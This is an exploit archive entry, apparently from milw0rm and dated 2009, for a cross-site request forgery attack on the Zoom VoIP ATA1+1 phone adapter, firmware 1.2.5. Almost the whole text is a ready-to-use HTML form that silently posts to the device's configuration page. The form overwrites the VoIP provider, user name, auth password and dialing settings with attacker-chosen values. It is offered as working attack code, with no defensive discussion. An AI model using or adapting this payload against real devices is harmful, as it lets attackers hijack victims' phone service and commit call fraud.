Exploit Code
Written By Michael Brooks Special thanks to str0ke! Zoom VoIP Phone Adapater ATA1+1 XSRF voip provider change xsrf version 1.2.5 <html> <form action="http://10.1.1.165/callwzd.html" method=post> <input name=DIRTY_PAGE value=3> <input name=HELP_PAGE value=html.html> <input name=_voip_provider_1___provider_type value=1> <input name=_voip_provider_1___provider_name value=hacked_again> <input name=_voip_provider_1___display_name value=hacked_again> <input name=_voip_provider_1___user_name value=hacked_again> <input name=_voip_provider_1___auth_user_name value=hacked_again> <input name=_voip_provider_1___auth_user_password value=hacked_again> <input name=ipbx_fxo_local_areacode value=hacked_again> <input name=ipbx_fxo_autodial_local_areacode value=hacked_again> <input name=ipbx_fxo_autodial_digit_leng value=6> <input name=BUTTON_FLASH value="Save+These+Settings"> <input type=submit> </form> </html> # milw0rm.com [2009-01-29]